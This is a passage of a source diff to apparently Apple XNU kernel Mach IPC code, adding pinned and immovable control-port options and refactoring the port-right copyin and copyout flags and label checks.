ipc_control_port_options, + "ipc_control_port_options", IPC_CONTROL_PORT_OPTIONS_DEFAULT); + +SECURITY_READ_ONLY_LATE(bool) pinned_control_port_enabled; +SECURITY_READ_ONLY_LATE(bool) immovable_control_port_enabled; + + LCK_GRP_DECLARE(ipc_lck_grp, "ipc"); LCK_ATTR_DECLARE(ipc_lck_attr, 0, 0); @@ -163,6 +176,15 @@ ipc_init(void) arcade_init(); #endif + pinned_control_port_enabled = !!(ipc_control_port_options & (IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT | IPC_CONTROL_PORT_OPTIONS_PINNED_HARD)); + immovable_control_port_enabled = !!(ipc_control_port_options & (IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_SOFT | IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD)); + + if (pinned_control_port_enabled && !immovable_control_port_enabled) { + kprintf("Invalid ipc_control_port_options boot-arg: pinned control port cannot be enabled without immovability enforcement. Ignoring pinning boot-arg."); + pinned_control_port_enabled = false; + ipc_control_port_options &= ~(IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT | IPC_CONTROL_PORT_OPTIONS_PINNED_HARD); + } + kr = kmem_suballoc(kernel_map, &min, IPC_KERNEL_MAP_SIZE, TRUE, (VM_FLAGS_ANYWHERE), diff --git a/osfmk/ipc/ipc_kmsg.c b/osfmk/ipc/ipc_kmsg.c index 04ec259aa..8b219581d 100644 --- a/osfmk/ipc/ipc_kmsg.c +++ b/osfmk/ipc/ipc_kmsg.c @@ -90,7 +90,6 @@ #include #include #include -#include #include #include #include @@ -2619,7 +2618,7 @@ ipc_kmsg_allow_immovable_send( * rights in the message body to succeed */ if (IO_VALID(object) && io_is_kobject(object)) { - kmsg->ikm_flags |= IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND; + kmsg->ikm_flags |= IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND; } } @@ -2992,7 +2991,7 @@ ipc_kmsg_copyin_header( */ if (reply_entry != IE_NULL) { kr = ipc_right_copyin(space, reply_name, reply_entry, - reply_type, IPC_RIGHT_COPYIN_FLAGS_DEADOK, + reply_type, IPC_OBJECT_COPYIN_FLAGS_DEADOK, &reply_port, &reply_soright, &release_port, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -3093,8 +3092,8 @@ ipc_kmsg_copyin_header( * copyin the destination. */ kr = ipc_right_copyin(space, dest_name, dest_entry, - dest_type, (IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND | - IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE), + dest_type, (IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND | + IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE), &dest_port, &dest_soright, &release_port, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -3110,7 +3109,7 @@ ipc_kmsg_copyin_header( */ if (MACH_PORT_VALID(reply_name)) { kr = ipc_right_copyin(space, reply_name, reply_entry, - reply_type, IPC_RIGHT_COPYIN_FLAGS_DEADOK, + reply_type, IPC_OBJECT_COPYIN_FLAGS_DEADOK, &reply_port, &reply_soright, &release_port, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -3127,7 +3126,7 @@ ipc_kmsg_copyin_header( */ if (IE_NULL != voucher_entry) { kr = ipc_right_copyin(space, voucher_name, voucher_entry, - voucher_type, IPC_RIGHT_COPYIN_FLAGS_NONE, + voucher_type, IPC_OBJECT_COPYIN_FLAGS_NONE, (ipc_object_t *)&voucher_port, &voucher_soright, &voucher_release_port, @@ -4605,6 +4604,7 @@ ipc_kmsg_copyout_header( uint32_t entries_held = 0; boolean_t need_write_lock = FALSE; + ipc_object_copyout_flags_t reply_copyout_options = IPC_OBJECT_COPYOUT_FLAGS_NONE; kern_return_t kr; /* @@ -4625,6 +4625,7 @@ ipc_kmsg_copyout_header( } if (need_write_lock) { +handle_reply_again: is_write_lock(space); while (entries_held) { @@ -4649,32 +4650,48 @@ ipc_kmsg_copyout_header( /* Handle reply port. */ if (IP_VALID(reply)) { + ipc_port_t reply_subst = IP_NULL; ipc_entry_t entry; + ip_lock(reply); + + /* Is the reply port still active and allowed to be copied out? */ + if (!ip_active(reply) || + !ip_label_check(space, reply, reply_type, + &reply_copyout_options, &reply_subst)) { + /* clear the context value */ + reply->ip_reply_context = 0; + ip_unlock(reply); + + assert(reply_subst == IP_NULL); + release_reply_port = reply; + reply = IP_DEAD; + reply_name = MACH_PORT_DEAD; + goto done_with_reply; + } + + /* is the kolabel requesting a substitution */ + if (reply_subst != IP_NULL) { + /* + * port is unlocked, its right consumed + * space is unlocked + */ + assert(reply_type == MACH_MSG_TYPE_PORT_SEND); + msg->msgh_local_port = reply = reply_subst; + goto handle_reply_again; + } + + /* Is there already an entry we can use? */ if ((reply_type != MACH_MSG_TYPE_PORT_SEND_ONCE) && ipc_right_reverse(space, ip_to_object(reply), &reply_name, &entry)) { - /* reply port is locked and active */ assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE); } else { - ip_lock(reply); - /* Is the reply port still active and allowed to be copied out? */ - if (!ip_active(reply) || !ip_label_check(space, reply, reply_type)) { - /* clear the context value */ - reply->ip_reply_context = 0; - ip_unlock(reply); - - release_reply_port = reply; - reply = IP_DEAD; - reply_name = MACH_PORT_DEAD; - goto done_with_reply; - } - /* claim a held entry for the reply port */ assert(entries_held > 0); entries_held--; ipc_entry_claim(space, &reply_name, &entry); - assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE); + assert(!ipc_right_inuse(entry)); assert(entry->ie_object == IO_NULL); entry->ie_object = ip_to_object(reply); } @@ -4711,7 +4728,8 @@ ipc_kmsg_copyout_header( } kr = ipc_right_copyout(space, reply_name, entry, - reply_type, NULL, NULL, ip_to_object(reply)); + reply_type, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, + ip_to_object(reply)); assert(kr == KERN_SUCCESS); /* reply port is unlocked */ } else { @@ -4738,25 +4756,25 @@ done_with_reply: if ((option & MACH_RCV_VOUCHER) != 0) { ipc_entry_t entry; + ip_lock(voucher); + if (ipc_right_reverse(space, ip_to_object(voucher), &voucher_name, &entry)) { - /* voucher port locked */ assert(entry->ie_bits & MACH_PORT_TYPE_SEND); } else { assert(entries_held > 0); entries_held--; ipc_entry_claim(space, &voucher_name, &entry); - assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE); + assert(!ipc_right_inuse(entry)); assert(entry->ie_object == IO_NULL); entry->ie_object = ip_to_object(voucher); - ip_lock(voucher); } /* space is locked and active */ - require_ip_active(voucher); + assert(ip_kotype(voucher) == IKOT_VOUCHER); kr = ipc_right_copyout(space, voucher_name, entry, - MACH_MSG_TYPE_MOVE_SEND, NULL, NULL, - ip_to_object(voucher)); + MACH_MSG_TYPE_MOVE_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE, + NULL, NULL, ip_to_object(voucher)); /* voucher port is unlocked */ } else { voucher_type = MACH_MSGH_BITS_ZERO; @@ -4931,8 +4949,7 @@ done_with_voucher: * MACH_MSG_IPC_KERNEL Kernel resource shortage. * (Name is MACH_PORT_NULL.) */ - -mach_msg_return_t +static mach_msg_return_t ipc_kmsg_copyout_object( ipc_space_t space, ipc_object_t object, @@ -4948,10 +4965,9 @@ ipc_kmsg_copyout_object( return MACH_MSG_SUCCESS; } - kr = ipc_object_copyout(space, object, msgt_name, context, guard_flags, namep); + kr = ipc_object_copyout(space, object, msgt_name, IPC_OBJECT_COPYOUT_FLAGS_NONE, + context, guard_flags, namep); if (kr != KERN_SUCCESS) { - ipc_object_destroy(object, msgt_name); - if (kr == KERN_INVALID_CAPABILITY) { *namep = MACH_PORT_DEAD; } else { @@ -4969,14 +4985,15 @@ ipc_kmsg_copyout_object( } static mach_msg_descriptor_t * -ipc_kmsg_copyout_port_descriptor(mach_msg_descriptor_t *dsc, - mach_msg_descriptor_t *dest_dsc, - ipc_space_t space, - kern_return_t *mr) +ipc_kmsg_copyout_port_descriptor( + mach_msg_descriptor_t *dsc, + mach_msg_descriptor_t *dest_dsc, + ipc_space_t space, + kern_return_t *mr) { - mach_port_t port; - mach_port_name_t name; - mach_msg_type_name_t disp; + mach_port_t port; + mach_port_name_t name; + mach_msg_type_name_t disp; /* Copyout port right carried in the message */ port = dsc->port.name; @@ -5005,17 +5022,20 @@ ipc_kmsg_copyout_port_descriptor(mach_msg_descriptor_t *dsc, return (mach_msg_descriptor_t *)dest_dsc; } -mach_msg_descriptor_t * -ipc_kmsg_copyout_ool_descriptor(mach_msg_ool_descriptor_t *dsc, mach_msg_descriptor_t *user_dsc, int is_64bit, vm_map_t map, mach_msg_return_t *mr); -mach_msg_descriptor_t * -ipc_kmsg_copyout_ool_descriptor(mach_msg_ool_descriptor_t *dsc, mach_msg_descriptor_t *user_dsc, int is_64bit, vm_map_t map, mach_msg_return_t *mr) +static mach_msg_descriptor_t * +ipc_kmsg_copyout_ool_descriptor( + mach_msg_ool_descriptor_t *dsc, + mach_msg_descriptor_t *user_dsc, + int is_64bit, + vm_map_t map, + mach_msg_return_t *mr) { - vm_map_copy_t copy; - vm_map_address_t rcv_addr; - mach_msg_copy_options_t copy_options; - vm_map_size_t size; + vm_map_copy_t copy; + vm_map_address_t rcv_addr; + mach_msg_copy_options_t copy_options; + vm_map_size_t size; mach_msg_descriptor_type_t dsc_type; - boolean_t misaligned = FALSE; + boolean_t misaligned = FALSE; //SKIP_PORT_DESCRIPTORS(saddr, sdsc_count); @@ -5441,20 +5461,24 @@ ipc_kmsg_copyout_body( for (i = dsc_count - 1; i >= 0; i--) { switch (kern_dsc[i].type.type) { case MACH_MSG_PORT_DESCRIPTOR: - user_dsc = ipc_kmsg_copyout_port_descriptor(&kern_dsc[i], user_dsc, space, &mr); + user_dsc = ipc_kmsg_copyout_port_descriptor(&kern_dsc[i], + user_dsc, space, &mr); break; case MACH_MSG_OOL_VOLATILE_DESCRIPTOR: case MACH_MSG_OOL_DESCRIPTOR: user_dsc = ipc_kmsg_copyout_ool_descriptor( - (mach_msg_ool_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, map, &mr); + (mach_msg_ool_descriptor_t *)&kern_dsc[i], + user_dsc, is_task_64bit, map, &mr); break; case MACH_MSG_OOL_PORTS_DESCRIPTOR: user_dsc = ipc_kmsg_copyout_ool_ports_descriptor( - (mach_msg_ool_ports_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, map, space, kmsg, &mr); + (mach_msg_ool_ports_descriptor_t *)&kern_dsc[i], + user_dsc, is_task_64bit, map, space, kmsg, &mr); break; case MACH_MSG_GUARDED_PORT_DESCRIPTOR: user_dsc = ipc_kmsg_copyout_guarded_port_descriptor( - (mach_msg_guarded_port_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, kmsg, space, option, &mr); + (mach_msg_guarded_port_descriptor_t *)&kern_dsc[i], + user_dsc, is_task_64bit, kmsg, space, option, &mr); break; default: { panic("untyped IPC copyout body: invalid message descriptor"); diff --git a/osfmk/ipc/ipc_kmsg.h b/osfmk/ipc/ipc_kmsg.h index dff4370cf..fe744639f 100644 --- a/osfmk/ipc/ipc_kmsg.h +++ b/osfmk/ipc/ipc_kmsg.h @@ -82,10 +82,6 @@ #include #include -typedef uint16_t ipc_kmsg_flags_t; - -#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 /* Dest port contains an immovable send right */ - #if (DEVELOPMENT || DEBUG) /* Turn on to keep partial message signatures for better debug */ #define IKM_PARTIAL_SIG 0 @@ -107,8 +103,6 @@ typedef uint16_t ipc_kmsg_flags_t; */ struct ipc_kmsg { - mach_msg_size_t ikm_size; - uint32_t ikm_ppriority; /* pthread priority of this kmsg */ struct ipc_kmsg *ikm_next; /* next message on port/discard queue */ struct ipc_kmsg *ikm_prev; /* prev message on port/discard queue */ union { @@ -123,12 +117,14 @@ struct ipc_kmsg { #if MACH_FLIPC struct mach_node *ikm_node; /* Originating node - needed for ack */ #endif + mach_msg_size_t ikm_size; + uint32_t ikm_ppriority; /* pthread priority of this kmsg */ #if IKM_PARTIAL_SIG uintptr_t ikm_header_sig; /* sig for just the header */ uintptr_t ikm_headtrail_sig;/* sif for header and trailer */ #endif uintptr_t ikm_signature; /* sig for all kernel-processed data */ - ipc_kmsg_flags_t ikm_flags; + ipc_object_copyin_flags_t ikm_flags; mach_msg_qos_t ikm_qos_override; /* qos override on this kmsg */ mach_msg_filter_id ikm_filter_policy_id; /* Sandbox-specific policy id used for message filtering */ }; @@ -334,15 +330,6 @@ extern mach_msg_return_t ipc_kmsg_copyout_header( ipc_space_t space, mach_msg_option_t option); -/* Copyout a port right returning a name */ -extern mach_msg_return_t ipc_kmsg_copyout_object( - ipc_space_t space, - ipc_object_t object, - mach_msg_type_name_t msgt_name, - mach_port_context_t *context, - mach_msg_guard_flags_t *guard_flags, - mach_port_name_t *namep); - /* Copyout the header and body to a user message */ extern mach_msg_return_t ipc_kmsg_copyout( ipc_kmsg_t kmsg, diff --git a/osfmk/ipc/ipc_mqueue.c b/osfmk/ipc/ipc_mqueue.c index d715828ab..98ad438bb 100644 --- a/osfmk/ipc/ipc_mqueue.c +++ b/osfmk/ipc/ipc_mqueue.c @@ -75,7 +75,7 @@ #include #include -#include +#include #include #include #include /* XXX - for mach_msg_receive_continue */ @@ -188,7 +188,6 @@ imq_reserve_and_lock(ipc_mqueue_t mq, uint64_t *reserved_prepost) void imq_release_and_unlock(ipc_mqueue_t mq, uint64_t reserved_prepost) { - assert(imq_held(mq)); waitq_unlock(&mq->imq_wait_queue); waitq_prepost_release_reserve(reserved_prepost); } @@ -592,7 +591,6 @@ ipc_mqueue_send( if (wresult == THREAD_WAITING) { wresult = thread_block(THREAD_CONTINUE_NULL); - counter(c_ipc_mqueue_send_block++); } /* Call turnstile complete with interlock held */ @@ -678,11 +676,7 @@ ipc_mqueue_override_send( if (full_queue_empty) { ipc_port_t port = ip_from_mq(mqueue); int dst_pid = 0; - if (ip_active(port) && !port->ip_tempowner && - port->ip_receiver_name && port->ip_receiver && - port->ip_receiver != ipc_space_kernel) { - dst_pid = task_pid(port->ip_receiver->is_task); - } + dst_pid = ipc_port_get_receiver_task(port, NULL); } #endif } @@ -704,7 +698,7 @@ ipc_mqueue_release_msgcount(ipc_mqueue_t port_mq, ipc_mqueue_t set_mq) { struct turnstile *send_turnstile = port_send_turnstile(ip_from_mq(port_mq)); (void)set_mq; - assert(imq_held(port_mq)); + imq_held(port_mq); assert(port_mq->imq_msgcount > 1 || ipc_kmsg_queue_empty(&port_mq->imq_messages)); port_mq->imq_msgcount--; @@ -1037,10 +1031,6 @@ ipc_mqueue_receive( } if (wresult == THREAD_WAITING) { - counter((interruptible == THREAD_ABORTSAFE) ? - c_ipc_mqueue_receive_block_user++ : - c_ipc_mqueue_receive_block_kernel++); - if (self->ith_continuation) { thread_block(ipc_mqueue_receive_continue); } @@ -1488,7 +1478,7 @@ void ipc_mqueue_release_peek_ref(ipc_mqueue_t mq) { assert(!imq_is_set(mq)); - assert(imq_held(mq)); + imq_held(mq); /* * clear any preposts this mq may have generated @@ -1718,7 +1708,7 @@ ipc_mqueue_destroy_locked(ipc_mqueue_t mqueue) * Changes a message queue limit; the maximum number * of messages which may be queued. * Conditions: - * Nothing locked. + * Port is locked. */ void diff --git a/osfmk/ipc/ipc_mqueue.h b/osfmk/ipc/ipc_mqueue.h index 98ea22434..47ed2259d 100644 --- a/osfmk/ipc/ipc_mqueue.h +++ b/osfmk/ipc/ipc_mqueue.h @@ -164,7 +164,7 @@ typedef struct ipc_mqueue { #define imq_is_valid(mq) waitq_is_valid(&(mq)->imq_wait_queue) #define imq_unlock(mq) waitq_unlock(&(mq)->imq_wait_queue) -#define imq_held(mq) waitq_held(&(mq)->imq_wait_queue) +#define imq_held(mq) assert(waitq_held(&(mq)->imq_wait_queue)) #define imq_valid(mq) waitq_valid(&(mq)->imq_wait_queue) extern void imq_lock(ipc_mqueue_t mq); diff --git a/osfmk/ipc/ipc_object.c b/osfmk/ipc/ipc_object.c index 5086568f6..f65ceff40 100644 --- a/osfmk/ipc/ipc_object.c +++ b/osfmk/ipc/ipc_object.c @@ -336,7 +336,8 @@ ipc_object_alloc_dead_name( } /* space is write-locked */ - if (ipc_right_inuse(space, name, entry)) { + if (ipc_right_inuse(entry)) { + is_write_unlock(space); return KERN_NAME_EXISTS; } @@ -382,21 +383,11 @@ ipc_object_alloc( assert(type != MACH_PORT_TYPE_NONE); assert(urefs <= MACH_PORT_UREFS_MAX); - object = io_alloc(otype); + object = io_alloc(otype, Z_WAITOK | Z_ZERO); if (object == IO_NULL) { return KERN_RESOURCE_SHORTAGE; } - if (otype == IOT_PORT) { - ipc_port_t port = ip_object_to_port(object); - - bzero((char *)port, sizeof(*port)); - } else if (otype == IOT_PORT_SET) { - ipc_pset_t pset = ips_object_to_pset(object); - - bzero((char *)pset, sizeof(*pset)); - } - io_lock_init(object); *namep = CAST_MACH_PORT_TO_NAME(object); kr = ipc_entry_alloc(space, namep, &entry); @@ -451,21 +442,11 @@ ipc_object_alloc_name( assert(type != MACH_PORT_TYPE_NONE); assert(urefs <= MACH_PORT_UREFS_MAX); - object = io_alloc(otype); + object = io_alloc(otype, Z_WAITOK | Z_ZERO); if (object == IO_NULL) { return KERN_RESOURCE_SHORTAGE; } - if (otype == IOT_PORT) { - ipc_port_t port = ip_object_to_port(object); - - bzero((char *)port, sizeof(*port)); - } else if (otype == IOT_PORT_SET) { - ipc_pset_t pset = ips_object_to_pset(object); - - bzero((char *)pset, sizeof(*pset)); - } - io_lock_init(object); kr = ipc_entry_alloc_name(space, name, &entry); if (kr != KERN_SUCCESS) { @@ -474,7 +455,8 @@ ipc_object_alloc_name( } /* space is write-locked */ - if (ipc_right_inuse(space, name, entry)) { + if (ipc_right_inuse(entry)) { + is_write_unlock(space); io_free(otype, object); return KERN_NAME_EXISTS; } @@ -562,13 +544,13 @@ ipc_object_copyin_type( kern_return_t ipc_object_copyin( - ipc_space_t space, - mach_port_name_t name, - mach_msg_type_name_t msgt_name, - ipc_object_t *objectp, - mach_port_context_t context, - mach_msg_guard_flags_t *guard_flags, - ipc_kmsg_flags_t kmsg_flags) + ipc_space_t space, + mach_port_name_t name, + mach_msg_type_name_t msgt_name, + ipc_object_t *objectp, + mach_port_context_t context, + mach_msg_guard_flags_t *guard_flags, + ipc_object_copyin_flags_t copyin_flags) { ipc_entry_t entry; ipc_port_t soright; @@ -576,11 +558,9 @@ ipc_object_copyin( kern_return_t kr; int assertcnt = 0; - ipc_right_copyin_flags_t irc_flags = IPC_RIGHT_COPYIN_FLAGS_DEADOK; - if (kmsg_flags & IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND) { - irc_flags |= IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND; - } - + ipc_object_copyin_flags_t irc_flags = IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND | + IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND; + irc_flags = (copyin_flags & irc_flags) | IPC_OBJECT_COPYIN_FLAGS_DEADOK; /* * Could first try a read lock when doing * MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND, @@ -685,8 +665,8 @@ ipc_object_copyin_from_kernel( ip_lock(port); if (ip_active(port)) { assert(port->ip_srights > 0); - port->ip_srights++; } + port->ip_srights++; ip_reference(port); ip_unlock(port); break; @@ -908,7 +888,7 @@ ipc_object_insert_send_right( * Routine: ipc_object_copyout * Purpose: * Copyout a capability, placing it into a space. - * If successful, consumes a ref for the object. + * Always consumes a ref for the object. * Conditions: * Nothing locked. * Returns: @@ -926,12 +906,14 @@ ipc_object_copyout( ipc_space_t space, ipc_object_t object, mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t flags, mach_port_context_t *context, mach_msg_guard_flags_t *guard_flags, mach_port_name_t *namep) { struct knote *kn = current_thread()->ith_knote; mach_port_name_t name; + ipc_port_t port = ip_object_to_port(object); ipc_entry_t entry; kern_return_t kr; @@ -939,73 +921,98 @@ ipc_object_copyout( assert(io_otype(object) == IOT_PORT); if (ITH_KNOTE_VALID(kn, msgt_name)) { - filt_machport_turnstile_prepare_lazily(kn, - msgt_name, ip_object_to_port(object)); + filt_machport_turnstile_prepare_lazily(kn, msgt_name, port); } is_write_lock(space); for (;;) { + ipc_port_t port_subst = IP_NULL; + if (!is_active(space)) { is_write_unlock(space); - return KERN_INVALID_TASK; - } - - if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) && - ipc_right_reverse(space, object, &name, &entry)) { - /* object is locked and active */ - - assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE); - break; + kr = KERN_INVALID_TASK; + goto out; } - - name = CAST_MACH_PORT_TO_NAME(object); - kr = ipc_entry_get(space, &name, &entry); + kr = ipc_entries_hold(space, 1); if (kr != KERN_SUCCESS) { /* unlocks/locks space, so must start again */ kr = ipc_entry_grow_table(space, ITS_SIZE_NONE); if (kr != KERN_SUCCESS) { - return kr; /* space is unlocked */ + /* space is unlocked */ + goto out; } continue; } - assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE); - assert(entry->ie_object == IO_NULL); - io_lock(object); if (!io_active(object)) { io_unlock(object); - ipc_entry_dealloc(space, name, entry); is_write_unlock(space); - return KERN_INVALID_CAPABILITY; + kr = KERN_INVALID_CAPABILITY; + goto out; } /* Don't actually copyout rights we aren't allowed to */ - if (!ip_label_check(space, ip_object_to_port(object), msgt_name)) { + if (!ip_label_check(space, port, msgt_name, &flags, &port_subst)) { io_unlock(object); - ipc_entry_dealloc(space, name, entry); is_write_unlock(space); - return KERN_INVALID_CAPABILITY; + assert(port_subst == IP_NULL); + kr = KERN_INVALID_CAPABILITY; + goto out; + } + + /* is the kolabel requesting a substitution */ + if (port_subst != IP_NULL) { + /* + * port is unlocked, its right consumed + * space is unlocked + */ + assert(msgt_name == MACH_MSG_TYPE_PORT_SEND); + port = port_subst; + if (!IP_VALID(port)) { + object = IO_DEAD; + kr = KERN_INVALID_CAPABILITY; + goto out; + } + + object = ip_to_object(port); + is_write_lock(space); + continue; } - entry->ie_object = object; break; } /* space is write-locked and active, object is locked and active */ + if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) && + ipc_right_reverse(space, object, &name, &entry)) { + assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE); + } else { + ipc_entry_claim(space, &name, &entry); + + assert(!ipc_right_inuse(entry)); + assert(entry->ie_object == IO_NULL); + + entry->ie_object = object; + } + kr = ipc_right_copyout(space, name, entry, - msgt_name, context, guard_flags, object); + msgt_name, flags, context, guard_flags, object); /* object is unlocked */ is_write_unlock(space); +out: if (kr == KERN_SUCCESS) { *namep = name; + } else if (IO_VALID(object)) { + ipc_object_destroy(object, msgt_name); } + return kr; } @@ -1035,6 +1042,7 @@ ipc_object_copyout_name( mach_msg_type_name_t msgt_name, mach_port_name_t name) { + ipc_port_t port = ip_object_to_port(object); mach_port_name_t oname; ipc_entry_t oentry; ipc_entry_t entry; @@ -1054,52 +1062,48 @@ ipc_object_copyout_name( } /* space is write-locked and active */ + io_lock(object); + + /* + * Don't actually copyout rights we aren't allowed to + * + * In particular, kolabel-ed objects do not allow callers + * to pick the name they end up with. + */ + if (!io_active(object) || ip_is_kolabeled(port)) { + io_unlock(object); + if (!ipc_right_inuse(entry)) { + ipc_entry_dealloc(space, name, entry); + } + is_write_unlock(space); + return KERN_INVALID_CAPABILITY; + } + + /* space is write-locked and active, object is locked and active */ + if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) && ipc_right_reverse(space, object, &oname, &oentry)) { - /* object is locked and active */ - if (name != oname) { io_unlock(object); - - if (IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE) { + if (!ipc_right_inuse(entry)) { ipc_entry_dealloc(space, name, entry); } - is_write_unlock(space); return KERN_RIGHT_EXISTS; } assert(entry == oentry); assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE); + } else if (ipc_right_inuse(entry)) { + io_unlock(object); + is_write_unlock(space); + return KERN_NAME_EXISTS; } else { - if (ipc_right_inuse(space, name, entry)) { - return KERN_NAME_EXISTS; - } - - assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE); assert(entry->ie_object == IO_NULL); - io_lock(object); - if (!io_active(object)) { - io_unlock(object); - ipc_entry_dealloc(space, name, entry); - is_write_unlock(space); - return KERN_INVALID_CAPABILITY; - } - - /* Don't actually copyout rights we aren't allowed to */ - if (!ip_label_check(space, ip_object_to_port(object), msgt_name)) { - io_unlock(object); - ipc_entry_dealloc(space, name, entry); - is_write_unlock(space); - return KERN_INVALID_CAPABILITY; - } - entry->ie_object = object; } - /* space is write-locked and active, object is locked and active */ - #if IMPORTANCE_INHERITANCE /* * We are slamming a receive right into the space, without @@ -1108,8 +1112,6 @@ ipc_object_copyout_name( * port has assertions (and the task wants them). */ if (msgt_name == MACH_MSG_TYPE_PORT_RECEIVE) { - ipc_port_t port = ip_object_to_port(object); - if (space->is_task != TASK_NULL) { task_imp = space->is_task->task_imp_base; if (ipc_importance_task_is_any_receiver_type(task_imp)) { @@ -1128,7 +1130,7 @@ ipc_object_copyout_name( #endif /* IMPORTANCE_INHERITANCE */ kr = ipc_right_copyout(space, name, entry, - msgt_name, NULL, NULL, object); + msgt_name, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, object); /* object is unlocked */ is_write_unlock(space); diff --git a/osfmk/ipc/ipc_object.h b/osfmk/ipc/ipc_object.h index 83021dd24..d67867f32 100644 --- a/osfmk/ipc/ipc_object.h +++ b/osfmk/ipc/ipc_object.h @@ -85,6 +85,20 @@ typedef natural_t ipc_object_refs_t; /* for ipc/ipc_object.h */ typedef natural_t ipc_object_bits_t; typedef natural_t ipc_object_type_t; +__options_closed_decl(ipc_object_copyout_flags_t, uint32_t, { + IPC_OBJECT_COPYOUT_FLAGS_NONE = 0x0, + IPC_OBJECT_COPYOUT_FLAGS_PINNED = 0x1, + IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK = 0x2, +}); + +__options_closed_decl(ipc_object_copyin_flags_t, uint32_t, { + IPC_OBJECT_COPYIN_FLAGS_NONE = 0x0, + IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND = 0x1, /* Dest port contains an immovable send right */ + IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND = 0x2, /* Silently fail copyin without guard exception */ + IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE = 0x4, + IPC_OBJECT_COPYIN_FLAGS_DEADOK = 0x8, +}); + /* * The ipc_object is used to both tag and reference count these two data * structures, and (Noto Bene!) pointers to either of these or the @@ -156,8 +170,11 @@ struct ipc_object_header { extern zone_t ipc_object_zones[IOT_NUMBER]; extern lck_grp_t ipc_lck_grp; -#define io_alloc(otype) \ - ((ipc_object_t) zalloc(ipc_object_zones[(otype)])) +static inline ipc_object_t +io_alloc(unsigned int otype, zalloc_flags_t flags) +{ + return zalloc_flags(ipc_object_zones[otype], flags); +} extern void io_free( unsigned int otype, @@ -333,7 +350,7 @@ extern kern_return_t ipc_object_copyin( ipc_object_t *objectp, mach_port_context_t context, mach_msg_guard_flags_t *guard_flags, - uint16_t kmsg_flags); + ipc_object_copyin_flags_t copyin_flags); /* Copyin a naked capability from the kernel */ extern void ipc_object_copyin_from_kernel( @@ -361,6 +378,7 @@ extern kern_return_t ipc_object_copyout( ipc_space_t space, ipc_object_t object, mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t flags, mach_port_context_t *context, mach_msg_guard_flags_t *guard_flags, mach_port_name_t *namep); diff --git a/osfmk/ipc/ipc_port.c b/osfmk/ipc/ipc_port.c index 2aa10cceb..2b7c9217c 100644 --- a/osfmk/ipc/ipc_port.c +++ b/osfmk/ipc/ipc_port.c @@ -83,6 +83,7 @@ #include #include #include +#include #include #include #include @@ -641,6 +642,8 @@ ipc_port_clear_receiver( * Purpose: * Initializes a newly-allocated port. * Doesn't touch the ip_object fields. + * + * The memory is expected to be zero initialized (allocated with Z_ZERO). */ void @@ -655,46 +658,23 @@ ipc_port_init( port->ip_receiver = space; port->ip_receiver_name = name; - port->ip_mscount = 0; - port->ip_srights = 0; - port->ip_sorights = 0; if (flags & IPC_PORT_INIT_MAKE_SEND_RIGHT) { port->ip_srights = 1; port->ip_mscount = 1; } - port->ip_nsrequest = IP_NULL; - port->ip_pdrequest = IP_NULL; - port->ip_requests = IPR_NULL; - - port->ip_premsg = IKM_NULL; - port->ip_context = 0; - port->ip_reply_context = 0; - - port->ip_sprequests = 0; - port->ip_spimportant = 0; - port->ip_impdonation = 0; - port->ip_tempowner = 0; - - port->ip_guarded = 0; - port->ip_strict_guard = 0; - port->ip_immovable_receive = 0; - port->ip_no_grant = 0; - port->ip_immovable_send = 0; - port->ip_impcount = 0; - if (flags & IPC_PORT_INIT_FILTER_MESSAGE) { port->ip_object.io_bits |= IP_BIT_FILTER_MSG; } port->ip_tg_block_tracking = (flags & IPC_PORT_INIT_TG_BLOCK_TRACKING) != 0; - port->ip_specialreply = (flags & IPC_PORT_INIT_SPECIAL_REPLY) != 0; - port->ip_sync_link_state = PORT_SYNC_LINK_ANY; - port->ip_sync_bootstrap_checkin = 0; - ipc_special_reply_port_bits_reset(port); + if (flags & IPC_PORT_INIT_SPECIAL_REPLY) { + port->ip_specialreply = true; + 